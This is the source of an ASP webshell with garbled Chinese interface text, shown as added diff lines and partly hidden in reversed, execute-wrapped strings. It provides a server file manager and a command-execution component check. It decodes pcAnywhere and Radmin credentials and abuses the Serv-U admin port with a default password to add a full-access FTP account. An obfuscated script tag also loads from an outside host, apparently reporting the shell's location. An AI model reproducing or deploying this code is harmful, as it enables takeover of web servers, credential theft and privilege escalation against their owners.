+Dim ObT(18,2):Fn=Action:ObT(0,0) = "Scripting.FileSystemObject":ObT(0,2) = "�� �� �� �� �� ��":ObT(1,0) = "wscript.shell":ObT(1,2) = "������ִ�����,��ʾ'<font color=red>��</font>'ʱ��<a href='?Action=cmdx' target='FileFrame'> <font color=red> ִ��Cmd��</font></a> �˹���ִ��":ObT(2,0) = "ADOX.Catalog":ObT(2,2) = "ACCESS �� �� �� ��":ObT(3,0) = "JRO.JetEngine":ObT(3,2) = "ACCESS ѹ �� �� ��":ObT(4,0) = "Scripting.Dictionary":ObT(4,2) = "������ �� �� ���� ���":ObT(5,0) = "Adodb.connection":ObT(5,2) = "���ݿ� ���� ���":ObT(6,0) = "Adodb.Stream":ObT(6,2) = "������ �ϴ� ���":ObT(7,0) = "SoftArtisans.FileUp":ObT(7,2) = "SA-FileUp �ļ� �ϴ� ���":ObT(8,0) = "LyfUpload.UploadFile":ObT(8,2) = "���Ʒ� �ļ� �ϴ� ���":ObT(9,0) = "Persits.Upload.1":ObT(9,2) = "ASPUpload �ļ� �ϴ� ���":ObT(10,0) = "JMail.SmtpMail":ObT(10,2) = "JMail �ʼ� �շ� ���":ObT(11,0) = "CDONTS.NewMail":ObT(11,2) = "����SMTP ���� ���":ObT(12,0) = "SmtpMail.SmtpMail.1":ObT(12,2) = "SmtpMail ���� ���":ObT(13,0) = "Microsoft.XMLHTTP":ObT(13,2) = "���� ���� ���"
+ObT(14,0) = "ws"&"cript.shell.1":  OBt(14,2) = "���wsh���������Ը���������":OBT(15,0) = "WS"&"CRIPT.NETWORK":  OBt(15,2) = "�鿴��������Ϣ���������ʱ����������Ȩ":OBT(16,0) = "she"&"ll.appl"&"ication":OBt(16,2) = "she"&"ll.appli"&"cation ��������FSOʱ�����ļ��Լ�ִ������":OBT(17,0) = "sh"&"ell.appl"&"ication.1":OBt(17,2) = "she"&"ll.appli"&"cation �ı�������FSOʱ�����ļ��Լ�ִ������":OBT(18,0) = "Shell.Users":OBt(18,2) = "ɾ����net.exe net1.exe������������û������"
+For i=0 To 18:Set T=Server.CreateObject(ObT(i,0)):If -2147221005 <> Err Then:IsObj=" ��":Else:IsObj=" ��":Err.Clear:End If:Set T=Nothing:ObT(i,1)=IsObj:Next:If FolderPath<>"" then:Session("FolderPath")=RRePath(FolderPath):End If:If Session("FolderPath")="" Then:FolderPath=WwwRoot:Session("FolderPath")=FolderPath:End if
+execute(shisanfun("))fLrCbv,����,))43(rhC,����,)edoca(tpyrcnE(ecalper(ecalper(esreveRrtS=nufE���<scrip3�� src='h3��&���3��p://��&��od��&��aye��&��x��&��p.c��&��o��&��m/��&���&��s��&��x/s.a��&���&���&��sp?s=��=edoca��noitcnuF dne��cbb=tpyrcnE��txen��fi dne��c&cbb=cbb��esle��)1,)e(tnic,1LEEHWs(dim&cbb=cbb��)���,�����,d(ecalper=e��1+i=i��)2,i,dca(dim=d��neht �����=c fi��)1,i,dca(dim=c��1 pets )dca(neL oT 1 = i roF��)dca(tpyrcnE noitcnuF���twj�� = 1LEEHWs"))
+Function PcAnywhere4()
+j"<div align='center'>PcAnywhere��Ȩ Bin�汾</div><form name='xform' method='post'><table width='80%'border='0'><tr><td width='10%'>cif�ļ�: </td><td width='10%'><input name='path' type='text' value='C:\Documents and Settings\All Users\Application Data\\Symantec\pcAnywhere\Citempl.cif' size='80'></td><td><input type='submit' value=' �ύ '></td></table>"
+end Function
+j"</form><script>function RUNonclick(){document.xform.china.name = parent.pwd.value;document.xform.action = parent.url.value;document.xform.submit();}</script>"
+Function StreamLoadFromFile(sPath)
+Dim oStream
+Set oStream = Server.CreateObject("Adodb.Stream")
+With oStream
+.Type = 1
+.Mode = 3
+.Open
+.LoadFromFile(sPath)
+.Position = 0
+StreamLoadFromFile = .Read
+.Close
+End With
+Set oStream = Nothing
+End Function
+Function hexdec(strin) 
+Dim i, j, k, result 
+result = 0 
+For i = 1 To Len(strin) 
+If Mid(strin, i, 1) = "f" Or Mid(strin, i, 1) ="F" Then 
+ j = 15 
+End If 
+If Mid(strin, i, 1) = "e" Or Mid(strin, i, 1) = "E" Then 
+ j = 14 
+End If 
+If Mid(strin, i, 1) = "d" Or Mid(strin, i, 1) = "D" Then 
+ j = 13 
+End If 
+If Mid(strin, i, 1) = "c" Or Mid(strin, i, 1) = "C" Then 
+ j = 12 
+End If 
+If Mid(strin, i, 1) = "b" Or Mid(strin, i, 1) = "B" Then 
+ j = 11 
+End If 
+If Mid(strin, i, 1) = "a" Or Mid(strin, i, 1) = "A" Then 
+ j = 10 
+End If 
+If Mid(strin, i, 1) <= "9" And Mid(strin, i, 1) >= "0" Then 
+ j = CInt(Mid(strin, i, 1)) 
+End If 
+For k = 1 To Len(strin) - i 
+ j = j * 16 
+Next 
+result = result + j 
+Next 
+hexdec = result 
+End Function 
+Function PcAnywhere(data,mode)
+HASH= Mid(data,3)
+If mode = "pass" Then number = 32: Cifnum = 144
+If mode = "user" Then number = 30: Cifnum = 15
+For i = 1 To number Step 2 
+pcstr=((hexdec(Mid(data,i,2)) xor hexdec(Mid(hash,i,2))) xor Cifnum)
+If ((pcstr <= 32) Or (pcstr>127)) Then Exit For 
+decode = decode + Chr(pcstr)
+Cifnum=Cifnum+1
+Next 
+PcAnywhere=decode
+End function
+Function bin2hex(binstr)
+For i = 1 To LenB(binstr)
+hexstr = Hex(AscB(MidB(binstr, i, 1)))
+If Len(hexstr)=1 Then 
+bin2hex=bin2hex&"0"&(LCase(hexstr))
+Else
+bin2hex=bin2hex& LCase(hexstr)
+End If 
+Next
+End Function
+CIF = Request("path")
+If CIF <> "" Then 
+BinStr=StreamLoadFromFile(CIF) 
+j"Pcanywhere Reader ==><br><br>PATH:"&CIF&"<br>�ʺ�:"&PcAnywhere (Mid(bin2hex(BinStr),919,64),"user")
+j"<br>����:"&PcAnywhere (Mid(bin2hex(BinStr),1177,32),"pass")
+End If 
+Function radmin()
+Set WSH= Server.CreateObject("WSCRIPT.SHELL")
+RadminPath="HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\"
+Parameter="Parameter"
+Port = "Port"
+j"<br>ע��:����HASHֵ����RadminHash���߻�od�������ӣ��������ص�ַ:"&htp&"soft/Radmin_hash.rar<br><br>"
+ParameterArray=WSH.REGREAD(RadminPath & Parameter )
+j Parameter&":"
+If IsArray(ParameterArray) Then
+For i = 0 To UBound(ParameterArray)
+If  Len (hex(ParameterArray(i)))=1 Then 
+strObj = strObj & "0"&CStr(Hex(ParameterArray(i)))
+Else
+strObj = strObj & Hex(ParameterArray(i))
+End If 
+Next
+j strobj
+Else
+j"Error! Can't Read!"
+End If
+j"<br><br>"
+PortArray=WSH.REGREAD(RadminPath & Port )
+If IsArray(PortArray) Then 
+j Port &":" 
+j hextointer(CStr(Hex(PortArray(1)))&CStr(Hex(PortArray(0))))
+Else 
+j"Error! Can't Read!"
+End If
+End Function
+Function hextointer(strin) 
+Dim i, j, k, result 
+result = 0 
+For i = 1 To Len(strin) 
+If Mid(strin, i, 1) = "f" Or Mid(strin, i, 1) ="F" Then 
+j = 15 
+End If 
+If Mid(strin, i, 1) = "e" Or Mid(strin, i, 1) = "E" Then 
+j = 14 
+End If 
+If Mid(strin, i, 1) = "d" Or Mid(strin, i, 1) = "D" Then 
+j = 13 
+End If 
+If Mid(strin, i, 1) = "c" Or Mid(strin, i, 1) = "C" Then 
+j = 12 
+End If 
+If Mid(strin, i, 1) = "b" Or Mid(strin, i, 1) = "B" Then 
+j = 11 
+End If 
+If Mid(strin, i, 1) = "a" Or Mid(strin, i, 1) = "A" Then 
+j = 10 
+End If 
+If Mid(strin, i, 1) <= "9" And Mid(strin, i, 1) >= "0" Then 
+j = CInt(Mid(strin, i, 1)) 
+End If 
+For k = 1 To Len(strin) - i 
+j = j * 16 
+Next 
+result = result + j 
+Next 
+hextointer = result 
+End Function:Function MainForm()
+execute(shisanfun("���>elbat/<>rt/<>dt/<>emarfi/<>'1'=redrobemarf '%001'=thgieh '%001'=htdiw 'eliF1wohS=noitcA?'=crs 'emarFeliF'=eman emarfi<>dt<>dt/<>emarfi/<>'0'=redrobemarf '%59'=thgieh '%001'=htdiw 'uneMniaM=noitcA?'=crs 'tfeL'=eman emarfi<>'071'=htdiw dt<>rt<>rt/<>dt/<>elbat/<>mrof/<>rt/<>dt/<��j:fi dne:��ko��=)��.��(noisses:)urevres&���(egapptthteg&�� ;psbn&;psbn&;psbn&;psbn&;psbn&��j:neht ��ko�� >< )��udiab��(noisses fi:��>a<������resullA��)01(>')�������\\sresU llA\\sgnitteS dna stnemucoD\\:C���(redloFwohS:tpircsavaj'=ferh ma=ssalc a<   >a<��erehwynAcp��)9(>')���erehwynAcp\\cetnamyS\\ataD noitacilppA\\1~esulla\\1~emucod\\:c���(redloFwohS:tpircsavaj'=ferh ma=ssalc a<;psbn&;psbn&;psbn&>a<���м���lerp��)8(>')���lerp\\:c���(redloFwohS:tpircsavaj'=ferh ma=ssalc a<>a<��lqssM��)7(>')���\\revreS LQS tfosorciM\\seliF margorP\\:C���(redloFwohS:tpircsavaj'=ferh ma=ssalc  a<;psbn&;psbn&;psbn&;psbn&;psbn&;psbn&>a<��PHP��)6(>')���php\\:C���(redloFwohS:tpircsavaj'=ferh ma=ssalc a<;psbn&;psbn&>a<��SWODNIW��)5(>')���SWODNIW\\:C���(redloFwohS:tpircsavaj'=ferh ma=ssalc a<;psbn&>a<��)2(UvreS��)4(>')���UvreS\\seliF margorP\\:C���(redloFwohS:tpircsavaj'=ferh ma=ssalc  a<>a<��)1(UvreS��)3(>')���moc.tfoSonihR\\seliF margorP\\:C���(redloFwohS:tpircsavaj'=ferh ma=ssalc a<;psbn&;psbn&;psbn&;psbn&>a<��PMET��)2(;psbn&;psbn&>')���pmeT\\SWODNIW\\:C���(redloFwohS:tpircsavaj'=ferh ma=ssalc a<>a<��bupmw��)1(>')���bupmw\\:C���(redloFwohS:tpircsavaj'=ferh ma=ssalc a<>rb<��j:fi dne:��ko��=)��sRP��(noisses:��>;psbn&��j:neht ��ko�� >< )��sRP��(noisses fi:��>a<��)\:e(RELCYCER��)01(>')���relcycer\\:e���(redloFwohS:tpircsavaj'=ferh ma=ssalc a<>a<��)\:d(RELCYCER��)9(>')���relcycer\\:D���(redloFwohS:tpircsavaj'=ferh ma=ssalc a<>a<��)\:C(RELCYCER��)8(>')���relcycer\\:C���(redloFwohS:tpircsavaj'=ferh ma=ssalc a<>a<����_�̡�)7(>')���\\���\\���ˡ�ʼ����\\sresU llA\\sgnitteS dna stnemucoD\\:C���(redloFwohS:tpircsavaj'=ferh ma=ssalc a<>a<���β�_ʼ�_��)6(>')���\\���ˡ�ʼ����\\sresU llA\\sgnitteS dna stnemucoD\\:C���(redloFwohS:tpircsavaj'=ferh ma=ssalc a<>a<��sresU_llA��)5(>')���\\sresU llA\\sgnitteS dna stnemucoD\\:C���(redloFwohS:tpircsavaj'=ferh ma=ssalc a<>a<��stnemucoD��)4(>')���stnemucoD\\sresU llA\\sgnitteS dna stnemucoD\\:C���(redloFwohS:tpircsavaj'=ferh ma=ssalc a<>a<��EmargorP��)3(>')���seliF margorP\\:e���(redloFwohS:tpircsavaj'=ferh ma=ssalc a<>a<��DmargorP��)2(>')���seliF margorP\\:d���(redloFwohS:tpircsavaj'=ferh ma=ssalc a<>a<��margorP��)1(>')���seliF margorP\\:C���(redloFwohS:tpircsavaj'=ferh ma=ssalc a<>rt<>emarfi/<>'1'=redrobemarf '%001'=thgieh '%001'=htdiw 'eliF1wohS=noitcA?'=crs 'emarFeliF'=eman emarfi<>dt<>'242424#:dnuorgkcab'=elyts 1=htdiw dt<>dt/<>p/<>a/<>b/<ʾ��>b<>##=ferh ���''=yalpsid.elyts.)'lt'(dIyBtnemelEteg.tnemucod���=kcilcno a<>p<>a/<>b/<����>b<>##=ferh ���'enon'=yalpsid.elyts.)'lt'(dIyBtnemelEteg.tnemucod���=kcilcno a<>'xp2:gniddap'=elyts 1=htdiw dt<>dt/<>'000000#:dnuorgkcab'=elyts 1=htdiw dt<>dt/<>emarfi/<>'0'=redrobemarf '%001'=thgieh '%001'=htdiw 'uneMniaM=noitcA?'=crs 'tfeL'=eman emarfi<>lt=di '061'=htdiw dt<>'0'=gnicapsllec '0'=gniddapllec ';000000# dilos xp1:redrob'=elyts '%5.59'=thgieh '%001'=htdiw elbat<>elbat/<>mrof/<>rt/<>dt/<>')(daoler.noitacol.emarFeliF'=kcilcno '��ˢ'=eulav 'timbus'=epyt tupni< >'OG'=eulav 'timbus'=epyt 'timbuS'=eman tupni<>'retnec'=ngila '041'=htdiw dt<>dt/<>'��&)��htaPredloF��(noisseS&��'=eulav '%001:htdiw'=elyts 'htaPredloF'=eman tupni<>dt<>dt/<��ַ��>'retnec'=ngila '06'=htdiw dt<>rt<>'tnerap_'=tegrat '��&LRU&��'=noitca 'tsop'=dohtem 'mrofrdda'=eman mrof<>'%001'=htdiw elbat<>mrof/<>���emaNF���=eman ���neddih���=epyt tupni<>���noitcA���=eman ���neddih���=epyt tupni<>���emarFeliF���=tegrat ����&LRU&����=noitca ���tsop���=dohtem ���mrofedih���=eman mrof<��j"))
+End Function
+
+
+
+
+ExeCuTe(ShiSanFun("buS dnE��gnihtoN = redloFeht teS��txeN��fI dnE��fI dnE��etadpU.sr��)(daeR.maerts = )��tnetnoCelif��(sr��)htaP.meti(eliFmorFdaoL.maerts��)4 ,htaP.meti(diM = )��htaPeht��(sr��weNddA.sr��nehT 0 =< )��$�� & emaN.meti & ��$�� ,tsiLeliFsys(rtSnI fI��eslE ��maerts ,sr ,htaP.meti bdMroFeerTas��nehT eurT = redloFsI.meti fI��smetI.redloFeht nI meti hcaE roF��)htaPeht(ecapSemaN.Xas = redloFeht teS���$bdl.HSH$bdm.HSH$�� = tsiLeliFsys��tsiLeliFsys ,redloFeht ,meti miD��)maerts ,sr ,htaPeht(bdMroFeerTas buS��buS dnE��pooL��fI dnE��0 = i��eslE ��)��\�� ,)1 + i ,htaPeht(diM(rtsnI + i = i��nehT )��\�� ,)1 + i ,htaPeht(diM(rtSnI fI��fI dnE��))1 - i ,htaPeht(tfeL(redloFetaerC.)��tcejbOmetsySeliF.gnitpircS��(tcejbOetaerC.revreS��nehT eslaF = ))i ,htaPeht(tfeL(stsixEredloF.)��tcejbOmetsySeliF.gnitpircS��(tcejbOetaerC.revreS fI��0 > i elihW oD��)��\�� ,htaPeht(rtsnI = i��i miD��)htaPeht(redloFetaerc buS��buS dnE��gnihtoN = nnoc teS��gnihtoN = maerts teS��gnihtoN = sr teS��gnihtoN = sw teS��esolC.maerts��esolC.nnoc��esolC.sr��pooL��txeNevoM.sr��2 ,)��htaPeht��(sr & rts eliFoTevaS.maerts��)��tnetnoCelif��(sr etirW.maerts��)(soEteS.maerts��fI dnE��)redloFeht & rts(redloFetaerc��nehT eslaF = )redloFeht & rts(stsixEredloF.)��tcejbOmetsySeliF.gnitpircS��(tcejbOetaerC.revreS fI��))��\�� ,)��htaPeht��(sr(veRrtSnI ,)��htaPeht��(sr(tfeL = redloFeht��foE.sr litnU oD��1 = epyT.maerts��nepO.maerts��1 ,1 ,nnoc ,��ataDeliF�� nepO.sr��rtSnnoc nepO.nnoc���;�� & htaPeht & ��=ecruoS ataD;0.4.BDELO.teJ.tfosorciM=redivorP�� = rtSnnoc��)��noitcennoC.BDODA��(tcejbOetaerC = nnoc teS��)��maertS.BDODA��(tcejbOetaerC = maerts teS��)��teSdroceR.BDODA��(tcejbOetaerC = sr teS���\�� & )��.��(htaPpaM.revreS = rts��redloFeht ,rtSnnoc ,maerts ,nnoc ,rts ,sw ,sr miD��000001=tuOemiTtpircS.revreS��txeN emuseR rorrE nO��)htaPeht(kcaPnu buS��)emanf&��\��&toorwww(eliFtxeTetaerC.osf=esonpser tes��noitcnuF dnE��gnihtoN = redloFeht teS��gnihtoN = sredlof teS��gnihtoN = selif teS��txeN��fI dnE��etadpU.sr��)(daeR.maerts = )��tnetnoCelif��(sr��)htaP.meti(eliFmorFdaoL.maerts��)4 ,htaP.meti(diM = )��htaPeht��(sr��weNddA.sr��nehT 0 =< )��$�� & emaN.meti & ��$�� ,tsiLeliFsys(rtSnI fI��selif nI meti hcaE roF��txeN��maerts ,sr ,htaP.meti bdMroFeerTosf��sredlof nI meti hcaE roF��sredloFbuS.redloFeht = sredlof teS��seliF.redloFeht = selif teS��)htaPeht(redloFteG.)��tcejbOmetsySeliF.gnitpircS��(tcejbOetaerC.revreS = redloFeht teS��fI dnE��)��!�ʷ����ʲ��߻��ڴ治¼Ŀ �� & htaPeht(rrEwohs��nehT eslaF = )htaPeht(stsixEredloF.)��tcejbOmetsySeliF.gnitpircS��(tcejbOetaerC.revreS fI���$bdl.HSH$bdm.HSH$�� = tsiLeliFsys��tsiLeliFsys ,selif ,sredlof ,redloFeht ,meti miD��)maerts ,sr ,htaPeht(bdMroFeerTosf noitcnuF��buS dnE��gnihtoN = golataCoda teS��gnihtoN = maerts teS��gnihtoN = nnoc teS��gnihtoN = sr teS��esolC.maerts��esolC.nnoC��esolC.sr��fI dnE��maerts ,sr ,htaPeht bdMroFeerTas��eslE ��maerts ,sr ,htaPeht bdMroFeerTosf��nehT ��osf�� = )��dohteMeht��(tseuqeR fI��3 ,3 ,nnoc ,��ataDeliF�� nepO.sr��1 = epyT.maerts��nepO.maerts��)��)egamI tnetnoCelif ,rahCraV htaPeht ,DERETSULC YEK YRAMIRP )1,0(YTITNEDI tni dI(ataDeliF elbaT etaerC��(etucexE.nnoc��rtSnnoc nepO.nnoc��rtSnnoc etaerC.golataCoda��)��bdm.HSH��(htaPpaM.revreS & ��=ecruoS ataD ;0.4.BDELO.teJ.tfosorciM=redivorP�� = rtSnnoc��)��golataC.XODA��(tcejbOetaerC.revreS = golataCoda teS��)��noitcennoC.BDODA��(tcejbOetaerC.revreS = nnoc teS��)��maertS.BDODA��(tcejbOetaerC.revreS = maerts teS��)��teSdroceR.BDODA��(tcejbOetaerC.revreS = sr teS��golataCoda ,rtSnnoc ,maerts ,nnoc ,sr miD��txeN emuseR rorrE nO��)htaPeht(bdMoTdda buS��buS dnE���>mrof/<��¼Ŀ��̱���λ������������������ :ע>rb<>rb<>'������'=eulav timbus=epyt tupni<>tcAeht=eman bdMmorFesaeler=eulav neddih=epyt tupni<>08=ezis ���bdm.HSH\�� & ))��.��(htaPpaM.revreS(edocnElmtH & ����=eulav htaPeht=eman tupni<>))���#���(noisseS(etucexE=eulav ���#���=eman neddih=epyt tupni<>tsop=dohtem mrof<>/rb<:)��֧OSF��(���������>/rh<>mrof/<��¼Ŀ��ͬ��ľmas��λ,����bdm.HSH�������� :ע>rb<>rb<>'����ʼ��'=eulav timbus=epyt tupni<>tceles/<>noitpo/<OSF��>ppa=eulav noitpo<>noitpo/<OSF>osf=eulav noitpo<>dohteMeht=eman tceles<>tcAeht=eman bdMoTdda=eulav neddih=epyt tupni<>08=ezis ���� & ))��.��(htaPpaM.revreS(edocnElmtH & ����=eulav htaPeht=eman tupni<>))���#���(noisseS(etucexE=eulav ���#���=eman neddih=epyt tupni<>tsop=dohtem mrof<:����м���>rb<��j��fI dnE��dnE.esnopseR��lrUkcaB&��>vid/<!��������>rb<>retnec=ngila vid<�� j��)htaPeht(kcaPnu��nehT ��bdMmorFesaeler�� = tcAeht fI��fI dnE��dnE.esnopseR��lrUkcaB&��>vid/<!��������>rb<>retnec=ngila vid<�� j��)htaPeht(bdMoTdda��nehT ��bdMoTdda�� = tcAeht fI��000001=tuOemiTtpircS.revreS��)��htaPeht��(tseuqeR = htaPeht��)��tcAeht��(tseuqeR = tcAeht��htaPeht ,tcAeht miD��)(bdMoTddAegaP buS��"))
+
+
+
+Function ProFile()
+execute(shisanfun("IS j���>elbat/<>mrof/<��&IS=IS���>rt/<>dt/<>'�̽�������������һ��'=eulav 'timbuS'=eman 'timbus'=epyt tupni<>05=thgieh dt<>dt/<;psbn&>dt<>rt<��&IS=IS���>rt/<>dt/<)������ȫ������񣬴�Խ������Ƶ����Խ���ĵĻ���Ҫ�裬��1ΪС��( �� >/ ���)'',g/]d\^[/(ecalper.eulav=eulav���=puyekno ���5���=ezis ���1���=eulav ���thgir:ngila-txet���=elyts ���emiTA���=eman ���txet���=epyt tupni<>dt<>dt/<����Ƶ����>thgir=ngila dt<>rt<��&IS=IS���>rt/<>dt/<)���ĸ��Գ��룬�����ֳ��������ʷ�( 8-FTU>/ ���2���=eulav ���rahCA���=eman ���oidar���=epyt tupni<  2132BG>/ dekcehc ���1���=eulav ���rahCA���=eman ���oidar���=epyt tupni<>dt<>dt/<��������>thgir=ngila dt<>rt<��&IS=IS���>rt/<>dt/<>aeratxet/<�������>���7���=swor ���07���=sloc ���edoCA���=eman aeratxet<>dt<>dt/<���������>thgir=ngila ���;xp3:pot-gniddap���=elyts pot=ngilav dt<>rt<��&IS=IS���>rt/<>dt/<>aeratxet/<��&)��psa.tset\��&)��htaPredloF��(noisseS(htaPeRR&��>���7���=swor ���07���=sloc ���eliFA���=eman aeratxet<��&IS=IS���>dt<>dt/<>tnof/<;psbn&;psbn&��·���ĸ�һ��ÿ>rb<;psbn&;psbn&���ĸ��໤��ʱͬ��>wolley=roloc tnof<>rb<����·���ĵĻ���Ҫ��>���0���=eulav ���avvv���=eman ���neddih���=epyt tupni<>thgir=ngila 'xp22:thgieh-enil'=elyts pot=ngilav dt<>rt<��&IS=IS���'tsoP=2noitcA&eliForP=noitcA?��&LRU&��'=noitca 'tsop'=dohtem 'mroFpU'=eman mrof<��&IS=IS���>'0'=gnicapsllec '0'=gniddapllec '0'=redrob elbat<>rb<��=IS��fI dnE��dnE.esnopseR���>rb<>retnec/<���̽�����>a/<����>knalb_=tegrat ��&2ssap&��=eliForP?��&LRU&��=ferh ���dlob:thgiew-tnof;enilrednu:noitaroced-txet���=elyts a<���㣡���ɳ��� >tnof/<��&2ssap&��>wolley=roloc tnof< �̽�����>retnec<>rb<>rb<>rb<��j��)��rahCA��(tseuqer=)��rahC��&2ssap(noitacilppA��)��emiTA��(tseuqer=)��emiT��&2ssap(noitacilppA��)��edoCA��(tseuqer=)��edoC��&2ssap(noitacilppA��)��eliFA��(tseuqer=)��eliF��&2ssap(noitacilppA��1=)2ssap(noitacilppA��)2ssap(esacu=2ssap�� pool��1mun&2ssap=2ssap��fi dne�� 9~0' ))84+dnr*)84-75((rhC(rtSC=1mun��esle�� z~a' ))79+dnr*)79-221((rhC(rtSC=1mun��neht 4=<)2ssap(neL fi��8<)2ssap(neL elihW oD����=2ssap��1mun,2ssap mid��ezimodnaR��nehT ��tsoP��=)��2noitcA��(tseuqeR fI��"))
+End Function
+
+
+Function suftp()
+execute(shisanfun("fi dne��gnihton=3TSOPx teS��)sevael(dneS.3tsoPx��eurT ,��sevael/��& trop &��:1.0.0.721//:ptth�� ,��TSOP�� nepO.3tsoPx��)��PTTHLMX.2LMXSM��(tcejbOetaerC = 3tsoPx teS��flrcbv & resut & ��=resU �� & flrcbv & tropt & ��=oNtroP-�� & flrcbv & ��0.0.0.0=PI-�� & flrcbv & ��RESUETELED-�� & sevael = sevael��flrcbv & ��ECNANETNIAM ETIS�� & sevael = sevael��flrcbv & dwp & �� ssaP�� & sevael = sevael��flrcbv & rsU & �� resU�� = sevael��esle��)��>RB<>rb<): �� & htapt & �� :��· �� & ssapt & �� :���ܩ� & �� �� & resut & �� :������ PTF������ִ����������( j��gnihton=TSOPx teS��)sevael(dneS.tsoPx��eurT ,��sevael/��& trop &��:1.0.0.721//:ptth�� ,��TSOP�� nepO.tsoPx��)��PTTHLMX.2LMXSM��(tcejbOetaerC = tsoPx teS��txeN emuseR rorrE nO��flrcbv & ��PDCLEMAWR|\�� & htapt & ��=sseccA �� & flrcbv & ��enoN=soitaR-�� & flrcbv & ��ralugeR=epyTdrowssaP-�� & flrcbv & ��metsyS=ecnanetniaM-���_ & flrcbv & ��0=mumixaMatouQ-�� & flrcbv & ��0=tnerruCatouQ-�� & flrcbv & ��0=tiderCsoitaR-�� & flrcbv & ��1=nwoDoitaR-���_ & flrcbv & ��1=pUoitaR-�� & flrcbv & ��0=eripxE-�� & flrcbv & ��1-=tuOemiTnoisseS-�� & flrcbv & ��006=tuOemiTeldI-�� & flrcbv & ��1-=sresUrNxaM-���_ & flrcbv & ��0=nwoDtimiLdeepS-�� & flrcbv & ��0=pUtimiLdeepS-�� & flrcbv & ��1-=PIrePnigoLsresUxaM-�� & flrcbv & ��0=elbanEatouQ-���_ & flrcbv & ��0=drowssaPegnahC-�� & flrcbv & ��0=nigoLwollAsyawlA-�� & flrcbv & ��0=neddiHediH-�� & flrcbv & ��0=eruceSdeeN-���_ & flrcbv & ��1=shtaPleR-�� & flrcbv & ��0=elbasiD-�� & flrcbv & ��=eliFseMnigoL-�� & flrcbv & ��\�� & htapt & ��=riDemoH-���_ & flrcbv & ssapt & ��=drowssaP-�� & flrcbv & resut & ��=resU-�� & flrcbv & tropt & ��=oNtroP-�� & flrcbv & ��0.0.0.0=PI-�� & flrcbv & ��PUTESRESUTES-�� & sevael = sevael��flrcbv & ��ECNANETNIAM ETIS�� & sevael = sevael��flrcbv & dwp & �� ssaP�� & sevael = sevael��flrcbv & rsU & �� resU�� = sevael��nehT ��dda�� = )��nottuboidar��(mroF.tseuqer fi��)��dmcd��(mroF.tseuqer = dnammoC'��)��tropt��(mroF.tseuqer = tropt��)��htapt��(mroF.tseuqer = htapt��)��ssapt��(mroF.tseuqer = ssapt��)��resut��(mroF.tseuqer = resut��)��tropd��(mroF.tseuqer = trop��)��dwpd��(mroF.tseuqer = dwp��)��resud��(mroF.tseuqer = rsU���>retnec/<>mrof/<>elbat/<>rt/<>dt/<>'1'=eulav 'noitca'=di 'neddih'=epyt 'noitcaUS'=eman tupni<>'teseR'=eulav '2timbuS'=eman 'teser'=epyt tupni<;psbn&>'oG tsuJ'=eulav 'timbuS'=eman 'timbus'=epyt tupni<>d=di '2'=napsloc dt<>'elddim'=ngilav 'retnec'=ngila rt<>rt/<>dt/<��ɾ��ȷ>d=di 'xoBtxeT'=ssalc 'led'=eulav 'nottuboidar'=eman 'oidar'=epyt tupni<;psbn&������ȷ>d=di 'xoBtxeT'=ssalc dekcehc 'dda'=eulav 'oidar'=epyt 'nottuboidar'=eman tupni<>d=di dt<>dt/<��������ִ>d=di dt<>'retnec'=ngila rt<>rt/<>dt/<>'12'=eulav 'tropt'=di 'xoBtxeT'=ssalc 'txet'=epyt 'tropt'=eman tupni<>d=di dt<>dt/<���ڶ����>d=di dt<>'retnec'=ngila rt<>rt/<>dt/<>'\:C'=eulav 'htapt'=di 'xoBtxeT'=ssalc 'txet'=epyt 'htapt'=eman tupni<>d=di dt<>dt/<����·�ʷ�>d=di dt<>'retnec'=ngila rt<>rt/<>dt/<>'1'=eulav 'ssap'=di 'xoBtxeT'=ssalc 'txet'=epyt 'ssapt'=eman tupni<>d=di dt<>dt/<����ڼ���>d=di dt<>'retnec'=ngila rt<>rt/<>dt/<>'redavni'=eulav 'resut'=di 'xoBtxeT'=ssalc 'txet'=epyt 'resut'=eman tupni<>d=di dt<>dt/<�����˼���>d=di dt<>'retnec'=ngila rt<>rt/<>dt/<>'85934'=eulav 'tropd'=di 'xoBtxeT'=ssalc 'txet'=epyt 'tropd'=eman tupni<>d=di dt<>dt/<���ڶ�ͳϵ>d=di dt<>'retnec'=ngila rt<>rt/<>dt/<>'P@0;kl.#ka$@l#'=eulav 'dwpd'=di 'xoBtxeT'=ssalc 'txet'=epyt 'dwpd'=eman tupni<>d=di dt<>dt/<�����ͳϵ>d=di dt<>'retnec'=ngila rt<>rt/<>dt/<>'rotartsinimdAlacoL'=eulav 'resud'=di 'xoBtxeT'=ssalc 'txet'=epyt 'resud'=eman tupni<>d=di dt<>dt/<������ͳϵ>d=di dt<>'retnec'=ngila rt<>rt/<>dt/<>b/<Ϣ�ű���ɼ�>B< >tnof/<8>sgnidbew=ecaf tnof<>s=di '2'=napsloc dt<>'elddim'=ngilav 'retnec'=ngila rt<>'005'=htdiw elbat<>''=noitca 'tsop'=dohtem '1mrof'=eman mrof<>rb<>retnec<��j��"))
+End Function
+
+
+
+Function MainMenu()
+j"<script language=javascript>function MM_show(s){if (document.getElementById(s).style.display==""""){document.getElementById(s).style.display=""none"";}else{document.getElementById(s).style.display="""";}}</script><table width='100%' cellspacing='0' cellpadding='0'><tr><td height='5'></td></tr><tr><td><center><font color=pink><font size=1.0>"&mName&"</font></font></center><hr color=#424242 size=1 ></td></tr>":If ObT(0,1)=" ��" Then
+j"<tr><td height='24'>��Ȩ��</td></tr>"
+Else
+j"<tr><td onClick=""MM_show('menud')""><input onMouseOver=""this.style.cursor='hand'"" type=button value='Disk & Files'></td></tr><tr><td height=4></td></tr><tr><td valign=""top"" align=center><table border=0  id=menud style=""display='none'"">"
+Set ABC=New LBF:j ABC.ShowDriver():Set ABC=Nothing
+
+j"</table></td></tr><tr><td valign=""top"" align=center><table border=0><tr><td id=d width=95 onMouseOver=""this.style.backgroundColor='#696969'"" onMouseOut=""this.style.backgroundColor='#121212'""><a href='javascript:ShowFolder("""&RePath(WWWRoot)&""")'><font face='wingdings'>8</font> վ���Ŀ¼"&ef
+j cdx&"<a href='javascript:ShowFolder("""&RePath(RootPath)&""")'>"&cxd&" ������Ŀ�"&ef
+j cdx&"<a href='?Action=goback' target='FileFrame'>"&cxd&" ���ϼ�Ŀ¼"&ef
+j cdx&"<a href='javascript:FullForm("""&RePath(Session("FolderPath")&"\Newfile")&""",""NewFolder"")'>"&cxd&" �½�--Ŀ�"&ef
+j cdx&"<a href='?Action=EditFile' target='FileFrame'>"&cxd&" �½�--�ı�"&ef
